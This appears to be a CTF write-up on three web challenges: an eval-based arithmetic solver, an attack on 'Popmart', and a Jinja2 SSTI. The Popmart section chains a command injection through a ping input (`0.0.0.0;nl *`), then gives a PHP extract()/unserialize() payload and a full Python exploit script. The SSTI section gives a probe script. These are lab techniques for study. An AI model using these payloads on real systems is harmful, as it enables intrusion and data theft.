Preface
An absurd competition; I don't want to play it a second time. What can I say.
Still, my teammates carried me and we took first place overall.
The Web challenges were relatively easy.
Quick Calculation
Regex-match the arithmetic expression out of the page and submit the result; 30 rounds and you are done.

```python
import re
import requests

URL = "http://10.1.127.10/"
session = requests.Session()
session_res = session.get(URL)
# Keep the session cookie so every answer is counted against the same round counter
cookie = session_res.cookies.get_dict()


def get_answer(text):
    """Pull the expression after 'Calculate:' (up to the <br>) and evaluate it.
    eval() on server-supplied text is the quick CTF route, not a safe one."""
    match = re.search(r'Calculate:\s*(.*?)(?=<br>)', text)
    if match:
        return eval(match.group(1))


answer = ''
i = 0
while True:
    res = session.post(URL, data={'answer': answer}, cookies=cookie, timeout=2)
    if 'DAS' in res.text:      # flag prefix: we are done
        print(res.text)
        break
    i = i + 1
    answer = get_answer(res.text)
    print(f'Round {i}: {answer}')
```
Popmart

```
┌──(mikannse㉿kali)-[~]
└─$ gobuster dir -u http://10.1.127.11/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,txt,zip,rar,bak,pdf
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.1.127.11/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              pdf,php,txt,zip,rar,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 499]
/img                  (Status: 301) [Size: 308] [--> http://10.1.127.11/img/]
/www.zip              (Status: 200) [Size: 2294]
/clear.php            (Status: 200) [Size: 0]
/audio                (Status: 301) [Size: 310] [--> http://10.1.127.11/audio/]
/css                  (Status: 301) [Size: 308] [--> http://10.1.127.11/css/]
/js                   (Status: 301) [Size: 307] [--> http://10.1.127.11/js/]
/config               (Status: 200) [Size: 156]
/flag.php             (Status: 200) [Size: 0]
/auth.php             (Status: 200) [Size: 16]
/fonts                (Status: 301) [Size: 310] [--> http://10.1.127.11/fonts/]
/load.php             (Status: 200) [Size: 0]
/server-status        (Status: 403) [Size: 276]
```
www.zip contains the source of load.php. I tried the file upload, but the web server's user cannot create the target directory, so the upload never lands:

```
┌──(mikannse㉿kali)-[~]
└─$ curl -X POST -F "upload_quwan=@/home/mikannse/1.jpeg" "http://10.1.127.11/load.php?action=mobile_upload_save"
<br />
<b>Warning</b>:  mkdir(): Permission denied in <b>/var/www/html/load.php</b> on line <b>63</b><br />
<br />
<b>Warning</b>:  move_uploaded_file(/var/www/html/2321922613/1.jpg): failed to open stream: No such file or directory in <b>/var/www/html/load.php</b> on line <b>27</b><br />
<br />
<b>Warning</b>:  move_uploaded_file(): Unable to move '/tmp/phpz8GSgw' to '/var/www/html/2321922613/1.jpg' in <b>/var/www/html/load.php</b> on line <b>27</b><br />
[1,"\/var\/www\/html\/2321922613\/1.jpg",2321922613,"1.jpg"]
```
So I turned to index.php. A hint released during the contest made it clear that the input is appended to a ping command, so further commands can be chained after it with `;`, but the input length is limited.
Sending `0.0.0.0;nl *` reads every file in the current directory (`nl` is short enough to fit the length limit and dumps each file with line numbers). The interesting one is p0pmart.php, and the challenge name already suggests a deserialization bug:

```php
<?php
error_reporting(0);
require_once("flag.php");

class popmart {
    public $yuki;
    public $molly;
    public $dimoo;

    // Only runs on `new`; unserialize() skips the constructor entirely
    public function __construct() {
        $this->yuki  = 'tell me where';
        $this->molly = 'dont_tell_you';
        $this->dimoo = "you_can_guess";
    }

    // Runs on unserialize(); yuki is taken from a global that extract() can set
    public function __wakeup() {
        global $flag;
        global $where_you_go;
        $this->yuki = $where_you_go;
        if ($this->molly === $this->yuki) {
            echo $flag;
        }
    }
}

$pucky = $_GET['wq'];
if (isset($pucky)) {
    if ($pucky === "二仙桥") {
        extract($_POST);            // every POST key becomes a global variable
        if ($pucky === "二仙桥") {  // only reachable if POST did not overwrite $pucky
            die("<script>window.alert('说说看,你要去哪??');</script>");
        }
        unserialize($pucky);
    }
}
```
The deserialization entry point is `$pucky`; the flag is printed when the object's `molly` equals its `yuki` after `__wakeup()` has run.
`__wakeup()` sets `$this->yuki = $where_you_go`, and `extract($_POST)` runs in the global scope, so a POST field named `where_you_go` becomes exactly that global. Because `unserialize()` calls `__wakeup()` but never `__construct()`, `molly` keeps whatever value we put in the payload instead of the constructor default `dont_tell_you`. The comparison is strict (`===`) and `$_POST` values are always strings, so `molly` must be serialized as a string with the same text we send in `where_you_go`.
Generate the serialized object:

```php
<?php
class popmart {
    public $yuki;
    public $molly = '1';   // must equal the where_you_go value we POST
    public $dimoo;
}
$a = new popmart();
$b = serialize($a);
print $b;
?>
```
Both checks happen in one request: pass `wq=二仙桥` as the GET parameter in the query string and send the following as the POST body (URL-encode the braces, quotes and semicolons if you build the body by hand):

```
where_you_go=1&pucky=O:7:"popmart":3:{s:4:"yuki";N;s:5:"molly";s:1:"1";s:5:"dimoo";N;}
```

`extract()` overwrites `$pucky` with our payload, so the second `二仙桥` check fails, the `die()` is skipped, and `unserialize()` runs on our object with `molly === yuki === "1"`.
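The whole exploit as an added example (my code, not from the writeup): it reproduces PHP's `serialize()` output for the three public properties, so the payload can be regenerated for any `where_you_go` value without a PHP interpreter, and sends the query parameter and form body in one request. The target URL `http://10.1.127.11/p0pmart.php` is an assumption based on the file name found with `nl *`; the page does not state the exact path.

```python
# Assumed location of the gadget file; the writeup only names it p0pmart.php.
TARGET = "http://10.1.127.11/p0pmart.php"


def php_serialize_popmart(molly, yuki=None, dimoo=None):
    """Reproduce PHP serialize() for a popmart object with three public
    properties. None -> 'N;', str -> 's:<byte length>:"<text>";'.
    PHP counts bytes, not characters, which matters for non-ASCII values."""
    def enc(value):
        if value is None:
            return "N;"
        return f's:{len(value.encode("utf-8"))}:"{value}";'

    props = [("yuki", yuki), ("molly", molly), ("dimoo", dimoo)]
    body = "".join(f's:{len(name)}:"{name}";{enc(val)}' for name, val in props)
    return f'O:7:"popmart":{len(props)}:{{{body}}}'


def build_request(secret="1"):
    """Return (query params, form body) for the single request:
    - wq=二仙桥 in the query string passes the first check;
    - extract($_POST) imports where_you_go (copied into yuki by __wakeup)
      and overwrites $pucky with the payload, so the second check fails
      and unserialize() runs on our object.
    molly is serialized as a string so the strict === comparison holds."""
    payload = php_serialize_popmart(molly=secret)
    return {"wq": "二仙桥"}, {"where_you_go": secret, "pucky": payload}


def fire(url=TARGET, secret="1"):
    """Send the request. requests URL-encodes the UTF-8 query value and the
    braces/quotes/semicolons in the form body, so the payload arrives intact."""
    import requests  # imported here so the payload builder works without it
    params, data = build_request(secret)
    resp = requests.post(url, params=params, data=data, timeout=5)
    return resp.text


if __name__ == "__main__":
    print(fire())
```

Any value works for `secret` as long as it is the same in `molly` and `where_you_go`; using an integer in the payload (`i:1;`) would fail the `===` check because the POSTed `where_you_go` is always a string.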
Sai Image
The home page exposes a /search route. Testing confirmed a Jinja2 SSTI, and fenjing solved it in one shot:

```
python -m fenjing scan --url=''
```
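The manual check behind "testing confirmed a Jinja2 SSTI", as an added example that is not part of the writeup: an arithmetic probe with randomised operands (so the expected number is unlikely to already be on the page, unlike the classic `{{7*7}}` and `49`), followed by the `{{7*'7'}}` fingerprint that separates Jinja2 (Python string repetition gives `7777777`) from Twig (PHP casts and gives `49`). The `/search` parameter name `q` is an assumption; the response bodies in the test are constructed.

```python
import random

# Jinja2 evaluates 7*'7' with Python semantics; Twig coerces '7' to a number.
ENGINE_PROBE = "{{7*'7'}}"


def arithmetic_probe(rng=random):
    """Return (payload, expected) with four-digit operands so the product is a
    distinctive seven- or eight-digit number rather than a common value like 49."""
    a, b = rng.randint(1000, 9999), rng.randint(1000, 9999)
    return "{{" + f"{a}*{b}" + "}}", str(a * b)


def classify(body, sent, expected):
    """'evaluated' if the template engine computed the expression,
    'reflected' if the raw braces came back (no evaluation),
    'absent' if the input does not appear at all."""
    if sent in body:
        return "reflected"
    if expected in body:
        return "evaluated"
    return "absent"


def fingerprint_engine(body):
    """Interpret the response to ENGINE_PROBE. '49' is a weak signal on its own,
    so only trust it once arithmetic_probe has already shown evaluation."""
    if "7777777" in body:
        return "jinja2"
    if ENGINE_PROBE in body:
        return "reflected"
    if "49" in body:
        return "twig"
    return "unknown"


def probe_search(base_url, param="q"):
    """Run both probes against e.g. http://host/search?q=... (param name assumed)."""
    import requests  # imported here so the offline helpers need no dependency
    sent, expected = arithmetic_probe()
    body = requests.get(base_url, params={param: sent}, timeout=5).text
    verdict = classify(body, sent, expected)
    if verdict != "evaluated":
        return verdict, None
    body = requests.get(base_url, params={param: ENGINE_PROBE}, timeout=5).text
    return verdict, fingerprint_engine(body)


if __name__ == "__main__":
    print(probe_search("http://10.1.127.12/search"))  # host is a placeholder
```

Only once `probe_search` returns `("evaluated", "jinja2")` is it worth handing the URL to fenjing, which then takes over payload generation and filter bypass.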